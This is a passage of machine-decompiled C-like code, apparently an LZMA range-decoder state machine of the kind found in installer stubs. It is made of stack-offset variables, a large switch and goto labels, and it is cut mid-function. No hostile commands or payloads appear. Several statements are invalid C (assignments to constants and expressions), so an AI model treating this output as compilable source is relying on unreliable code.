											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
